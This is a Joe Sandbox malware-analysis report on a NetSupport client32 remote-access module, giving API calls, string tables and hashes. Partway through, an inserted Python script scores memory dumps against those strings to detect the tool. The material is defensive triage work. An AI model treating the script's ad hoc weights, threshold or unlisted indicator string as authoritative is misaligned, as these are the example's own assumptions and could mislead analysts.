                                                                                                                                                    control_flow_graph 2703 6ca863c0-6ca86402 call 6caa4710 EnterCriticalSection InterlockedDecrement 2706 6ca86408-6ca8641f EnterCriticalSection 2703->2706 2707 6ca865ed-6ca86608 LeaveCriticalSection call 6caa28e1 2703->2707 2709 6ca864da-6ca864e0 2706->2709 2710 6ca86425-6ca86431 2706->2710 2714 6ca865bd-6ca865e8 _memset LeaveCriticalSection 2709->2714 2715 6ca864e6-6ca864f0 shutdown 2709->2715 2712 6ca86443-6ca86447 2710->2712 2713 6ca86433-6ca86441 GetProcAddress 2710->2713 2716 6ca86449-6ca8644c 2712->2716 2717 6ca8644e-6ca86450 SetLastError 2712->2717 2713->2712 2714->2707 2718 6ca8650a-6ca8652d timeGetTime #16 2715->2718 2719 6ca864f2-6ca86507 GetLastError call 6ca830a0 2715->2719 2723 6ca86456-6ca86465 2716->2723 2717->2723 2721 6ca8656c-6ca8656e 2718->2721 2722 6ca8652f 2718->2722 2719->2718 2729 6ca86570-6ca8657b closesocket 2721->2729 2727 6ca86551-6ca8656a #16 2722->2727 2728 6ca86531 2722->2728 2724 6ca86477-6ca8647b 2723->2724 2725 6ca86467-6ca86475 GetProcAddress 2723->2725 2731 6ca8647d-6ca86480 2724->2731 2732 6ca86482-6ca86484 SetLastError 2724->2732 2725->2724 2727->2721 2727->2722 2728->2727 2733 6ca86533-6ca8653e GetLastError 2728->2733 2734 6ca8657d-6ca8658a WSAGetLastError 2729->2734 2735 6ca865b6 2729->2735 2736 6ca8648a-6ca86499 2731->2736 2732->2736 2733->2721 2737 6ca86540-6ca86547 timeGetTime 2733->2737 2738 6ca8658c-6ca8658e Sleep 2734->2738 2739 6ca86594-6ca86598 2734->2739 2735->2714 2741 6ca864ab-6ca864af 2736->2741 2742 6ca8649b-6ca864a9 GetProcAddress 2736->2742 2737->2721 2743 6ca86549-6ca8654b Sleep 2737->2743 2738->2739 2739->2729 2744 6ca8659a-6ca8659c 2739->2744 2745 6ca864b1-6ca864be 2741->2745 2746 6ca864c3-6ca864d5 SetLastError 2741->2746 2742->2741 2743->2727 2744->2735 2747 6ca8659e-6ca865b3 GetLastError call 6ca830a0 2744->2747 2745->2714 2746->2714 2747->2735
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(6CACB898,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA863E8
                                                                                                                                                    • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6CA863FA
                                                                                                                                                    • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6CA8D77B,00000000), ref: 6CA86412
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA8643B
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,6CA8D77B,00000000), ref: 6CA86450
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA8646F
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,6CA8D77B,00000000), ref: 6CA86484
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6CA864A3
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,00000000,?,6CA8D77B,00000000), ref: 6CA864C5
                                                                                                                                                    • shutdown.WSOCK32(?,00000001,?,00000000,?,6CA8D77B,00000000), ref: 6CA864E9
                                                                                                                                                    • GetLastError.KERNEL32(?,00000001,?,00000000,?,6CA8D77B,00000000), ref: 6CA864F2
                                                                                                                                                    • timeGetTime.WINMM(?,00000001,?,00000000,?,6CA8D77B,00000000), ref: 6CA86510
                                                                                                                                                    • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA86526
                                                                                                                                                    • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA86533
                                                                                                                                                    • timeGetTime.WINMM(?,00000000,?,6CA8D77B,00000000), ref: 6CA86540
                                                                                                                                                    • Sleep.KERNEL32(00000001,?,00000000,?,6CA8D77B,00000000), ref: 6CA8654B
                                                                                                                                                    • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA86563
                                                                                                                                                    • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA86574
                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA8657D
                                                                                                                                                    • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA8658E
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6CA8D77B,00000000), ref: 6CA8659E
                                                                                                                                                    • _memset.LIBCMT ref: 6CA865C8
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,6CA8D77B,00000000), ref: 6CA865D7
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898,?,00000000,?,6CA8D77B,00000000), ref: 6CA865F2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                                                                                    • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                                                                                    • API String ID: 3764039262-2631155478
                                                                                                                                                    • Opcode ID: bd97d6cdf9e956285510274407e2df1370b516f15b21c1af1560d31f83f5b264
                                                                                                                                                    • Instruction ID: 6e664d649e1dfdc7e8f45af5640b95755924380e2662ac14ea352e21ea1d2235
                                                                                                                                                    • Opcode Fuzzy Hash: bd97d6cdf9e956285510274407e2df1370b516f15b21c1af1560d31f83f5b264
                                                                                                                                                    • Instruction Fuzzy Hash: F751D2B1701301AFE7089F68C988B5A73B8BF49318F114514E506D7B80EB70E9CACB61

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 2751 6ca898d0-6ca89932 2752 6ca89934-6ca89955 call 6ca830a0 call 6caa28e1 2751->2752 2753 6ca89956-6ca8995e 2751->2753 2755 6ca89964-6ca89979 _strncmp 2753->2755 2756 6ca89ac5-6ca89acc 2753->2756 2755->2756 2758 6ca8997f-6ca89994 call 6caa4330 2755->2758 2759 6ca89b19-6ca89b1d 2756->2759 2760 6ca89ace-6ca89adb 2756->2760 2758->2756 2773 6ca8999a-6ca899af _strncmp 2758->2773 2761 6ca89b4b-6ca89b70 GetTickCount InterlockedExchange EnterCriticalSection 2759->2761 2762 6ca89b1f-6ca89b26 2759->2762 2765 6ca89af8-6ca89b07 wsprintfA 2760->2765 2766 6ca89add-6ca89af6 wsprintfA 2760->2766 2770 6ca89b9c-6ca89ba1 2761->2770 2771 6ca89b72-6ca89b9b LeaveCriticalSection call 6ca830a0 call 6caa28e1 2761->2771 2762->2761 2769 6ca89b28-6ca89b41 call 6ca877b0 2762->2769 2768 6ca89b0a-6ca89b16 call 6ca852b0 2765->2768 2766->2768 2768->2759 2769->2761 2790 6ca89b43-6ca89b45 2769->2790 2774 6ca89bfb-6ca89c05 2770->2774 2775 6ca89ba3-6ca89bd0 call 6ca84dd0 2770->2775 2773->2756 2779 6ca899b5-6ca899f1 2773->2779 2782 6ca89c3b-6ca89c47 2774->2782 2783 6ca89c07-6ca89c17 2774->2783 2797 6ca89d4b-6ca89d6c LeaveCriticalSection call 6ca977e0 2775->2797 2798 6ca89bd6-6ca89bf6 WSAGetLastError call 6ca830a0 2775->2798 2786 6ca899f7-6ca899ff 2779->2786 2792 6ca89c50-6ca89c5a 2782->2792 2788 6ca89c19-6ca89c1d 2783->2788 2789 6ca89c20-6ca89c22 2783->2789 2795 6ca89aa3-6ca89ac2 call 6ca830a0 2786->2795 2796 6ca89a05-6ca89a08 2786->2796 2788->2789 2799 6ca89c1f 2788->2799 2789->2782 2800 6ca89c24-6ca89c36 call 6ca846c0 2789->2800 2790->2761 2793 6ca89d2e-6ca89d3b call 6ca830a0 2792->2793 2794 6ca89c60-6ca89c65 2792->2794 2818 6ca89d45 2793->2818 2803 6ca89c71-6ca89c9a send 2794->2803 2804 6ca89c67-6ca89c6b 2794->2804 2795->2756 2806 6ca89a0a-6ca89a0c 2796->2806 2807 6ca89a0e 2796->2807 2821 6ca89d78-6ca89d8a call 6caa28e1 2797->2821 2822 6ca89d6e-6ca89d72 InterlockedIncrement 2797->2822 2798->2797 2799->2789 2800->2782 2812 6ca89c9c-6ca89c9f 2803->2812 2813 6ca89cf1-6ca89d0f call 6ca830a0 2803->2813 2804->2793 2804->2803 2815 6ca89a14-6ca89a1d 2806->2815 2807->2815 2819 6ca89cbe-6ca89cce WSAGetLastError 2812->2819 2820 6ca89ca1-6ca89cac 2812->2820 2813->2818 2823 6ca89a8d-6ca89a8e 2815->2823 2824 6ca89a1f-6ca89a22 2815->2824 2818->2797 2827 6ca89cd0-6ca89ce9 timeGetTime Sleep 2819->2827 2828 6ca89d11-6ca89d2c call 6ca830a0 2819->2828 2820->2818 2826 6ca89cb2-6ca89cbc 2820->2826 2822->2821 2823->2795 2830 6ca89a24 2824->2830 2831 6ca89a26-6ca89a35 2824->2831 2826->2827 2827->2792 2833 6ca89cef 2827->2833 2828->2818 2830->2831 2835 6ca89a90-6ca89a93 2831->2835 2836 6ca89a37-6ca89a3a 2831->2836 2833->2818 2838 6ca89a9d 2835->2838 2839 6ca89a3c 2836->2839 2840 6ca89a3e-6ca89a4d 2836->2840 2838->2795 2839->2840 2842 6ca89a4f-6ca89a52 2840->2842 2843 6ca89a95-6ca89a98 2840->2843 2844 6ca89a54 2842->2844 2845 6ca89a56-6ca89a65 2842->2845 2843->2838 2844->2845 2846 6ca89a9a 2845->2846 2847 6ca89a67-6ca89a6a 2845->2847 2846->2838 2848 6ca89a6c 2847->2848 2849 6ca89a6e-6ca89a85 2847->2849 2848->2849 2849->2786 2850 6ca89a8b 2849->2850 2850->2795
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strncmp
                                                                                                                                                    • String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
                                                                                                                                                    • API String ID: 909875538-2848211065
                                                                                                                                                    • Opcode ID: a4703cc2b44a8790c6ab90629fef6d2189b2f25b1015b4c413de6fa007ab9c3b
                                                                                                                                                    • Instruction ID: 727875143ba0d5cc1b7694af69af70550f76265b2e55d1adcce86211825f6440
                                                                                                                                                    • Opcode Fuzzy Hash: a4703cc2b44a8790c6ab90629fef6d2189b2f25b1015b4c413de6fa007ab9c3b
                                                                                                                                                    • Instruction Fuzzy Hash: D2D103B1A062199FDB20CF74CA84BE9B7B4AF0A308F1841D9D90D9B641D735DACACF51

Control-flow Graph
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,74801370,?,0000001A), ref: 11028CFD
                                                                                                                                                    • _strrchr.LIBCMT ref: 11028D0C
                                                                                                                                                      • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                                                                    • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                                                    • API String ID: 1609618855-357498123
                                                                                                                                                    • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                                                                    • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                                                                                    • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                                                                    • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96BD5
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96C26
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 6CA96C5B
                                                                                                                                                      • Part of subcall function 6CA96940: GetTickCount.KERNEL32 ref: 6CA96950
                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000314,?), ref: 6CA96C7C
                                                                                                                                                    • _memmove.LIBCMT ref: 6CA96C93
                                                                                                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6CA96CB4
                                                                                                                                                    • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6CA96CD9
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96CEC
                                                                                                                                                    • _calloc.LIBCMT ref: 6CA96D76
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96DF3
                                                                                                                                                    • InterlockedExchange.KERNEL32(03822D3A,00000000), ref: 6CA96E01
                                                                                                                                                    • _calloc.LIBCMT ref: 6CA96E33
                                                                                                                                                    • _memmove.LIBCMT ref: 6CA96E47
                                                                                                                                                    • InterlockedDecrement.KERNEL32(03822CE2), ref: 6CA96EC3
                                                                                                                                                    • SetEvent.KERNEL32(0000031C), ref: 6CA96ECF
                                                                                                                                                    • _memmove.LIBCMT ref: 6CA96EF4
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96F4F
                                                                                                                                                    • InterlockedExchange.KERNEL32(03822C82,-6CACA188), ref: 6CA96F60
                                                                                                                                                    Strings
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6CA96E62
                                                                                                                                                    • ResumeTimeout, xrefs: 6CA96BBA
                                                                                                                                                    • ProcessMessage returned FALSE. Terminating connection, xrefs: 6CA96F25
                                                                                                                                                    • ReadMessage returned FALSE. Terminating connection, xrefs: 6CA96F3A
                                                                                                                                                    • httprecv, xrefs: 6CA96BDD
                                                                                                                                                    • FALSE, xrefs: 6CA96E67
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                                                                    • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                                                                    • API String ID: 1449423504-919941520
                                                                                                                                                    • Opcode ID: 93c6792346eada87d0ad622549458b43d103ac93c474c75b3beb57113fcbbbf5
                                                                                                                                                    • Instruction ID: a2ae4cdcec17aedc33514dc8db8ca586f1eb3fb3128d4a27bf2011a2987b5221
                                                                                                                                                    • Opcode Fuzzy Hash: 93c6792346eada87d0ad622549458b43d103ac93c474c75b3beb57113fcbbbf5
                                                                                                                                                    • Instruction Fuzzy Hash: F6B1F1B1E102589BDB24DF64CD49BD9B3B4AF08348F04819AE589E7740D7B49BC9CF91
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNEL32 ref: 11030F12
                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 11031037
                                                                                                                                                      • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                                                                    • InterlockedExchange.KERNEL32(02E68D80,00001388), ref: 110313BA
                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                                                                      • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                                                                                                    • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                                                                                                    • API String ID: 1620732580-3468083601
                                                                                                                                                    • Opcode ID: 59eca2369bb3a4e4a2a112550fa64f7f872260151d0ac89f22c24856b26732e2
                                                                                                                                                    • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                                                                                                    • Opcode Fuzzy Hash: 59eca2369bb3a4e4a2a112550fa64f7f872260151d0ac89f22c24856b26732e2
                                                                                                                                                    • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51
APIs
• LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
• LoadLibraryA.KERNEL32(?), ref: 11086ABC
• GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
• GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
• GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
• GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
• GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
• GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$FileModuleName
• String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
• API String ID: 2201880244-3035937465
• Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
• Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
• Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
• Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
APIs
• RegCloseKey.ADVAPI32(00000000), ref: 111424BA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Close
• String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
• API String ID: 3535843008-1834795898
• Opcode ID: c3b0beb785d61d14bc09d6443188457746b9abe6a1dfff17b4c73e4d473e28b0
• Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
• Opcode Fuzzy Hash: c3b0beb785d61d14bc09d6443188457746b9abe6a1dfff17b4c73e4d473e28b0
• Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61
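The two function blocks above expose the strings a triage analyst actually keys on when deciding whether a memory dump or dropped binary is the NetSupport client32 component: the CryptPak.dll exports resolved by name through GetProcAddress (CipherServer_Create, CipherServer_EncryptBlocks and the rest), the licence file names NSM.LIC, NSA.LIC and IKS.LIC, and the ctl32 source paths compiled into the module. The following script is an added example, not part of the Joe Sandbox report and not NetSupport's own code; it scores a byte buffer against exactly those strings. The indicator weights, the detection threshold and the embedded SAMPLE_DUMP are the example's own assumptions; on a real case, replace SAMPLE_DUMP with the bytes of the .sdmp file listed under Memory Dump Source.

```python
"""
Added example: string-based triage for NetSupport client32 artifacts.
Not part of the sandbox report or of NetSupport's code base.
"""
from __future__ import annotations

import re

# Export names the report shows client32 resolving from CryptPak.dll.
# The GetProcAddress calls use narrow (ANSI) names, so the regex is ASCII-only.
_CIPHER_RE = re.compile(rb"CipherServer_[A-Za-z]+")

# Indicators taken from the report's string tables. The weights are an
# assumption made for this example: build paths and licence file names are
# far more specific than a generic DLL name or log message.
INDICATORS: dict[bytes, int] = {
    b"CryptPak.dll": 2,
    b"NSM.LIC": 3,
    b"NSA.LIC": 3,
    b"IKS.LIC": 3,
    b"pcicl32": 2,
    b"e:\\nsmsrc\\nsm\\": 5,          # prefix of the NSMString.h source path
    b"..\\ctl32\\Connect.cpp": 5,
    b"TracePolicyChange": 1,
}


def _variants(name: bytes) -> tuple[bytes, bytes]:
    """ASCII form plus its UTF-16LE form, so wide-string copies are not missed."""
    return name, name.decode("ascii").encode("utf-16-le")


def _present(name: bytes, data: bytes) -> bool:
    return any(v in data for v in _variants(name))


def find_cipherserver_exports(data: bytes) -> list[str]:
    """Distinct CipherServer_* export names found in the buffer, sorted."""
    return sorted({m.decode("ascii") for m in _CIPHER_RE.findall(data)})


def score_indicators(data: bytes) -> tuple[int, list[str]]:
    """Return (score, matched indicator names). Each resolved export adds one point."""
    hits = [name.decode("ascii") for name in INDICATORS if _present(name, data)]
    score = sum(w for name, w in INDICATORS.items() if _present(name, data))
    score += len(find_cipherserver_exports(data))
    return score, hits


def is_likely_netsupport_client(data: bytes, threshold: int = 8) -> bool:
    """Threshold is this example's assumption, not a published vendor value."""
    score, _ = score_indicators(data)
    return score >= threshold


# Constructed sample buffer (assumption): a few of the report's strings with
# NUL padding, one of them stored as UTF-16LE to exercise the wide-string path.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"CryptPak.dll\x00CipherServer_Create\x00CipherServer_Destroy\x00"
    + b"CipherServer_EncryptBlocks\x00CipherServer_DecryptBlocks\x00"
    + b"NSM.LIC\x00e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\NSMString.h\x00"
    + "..\\ctl32\\Connect.cpp".encode("utf-16-le")
    + b"\x00" * 16
)

if __name__ == "__main__":
    total, matched = score_indicators(SAMPLE_DUMP)
    print("exports:", find_cipherserver_exports(SAMPLE_DUMP))
    print("score:", total, "matched:", matched)
    print("likely NetSupport client32:", is_likely_netsupport_client(SAMPLE_DUMP))
```

The check is deliberately string-only so it can run on a raw .sdmp region without parsing a PE header; a packed or encrypted first stage will not match until it has been unpacked in memory, which is why the report's dump at offset 11000000 (already mapped, "based on PE: true") is the right input, not the Update.js dropper.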
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
• InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
• InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
• InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
• InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
• InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
• _strncpy.LIBCMT ref: 11074E38
• ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
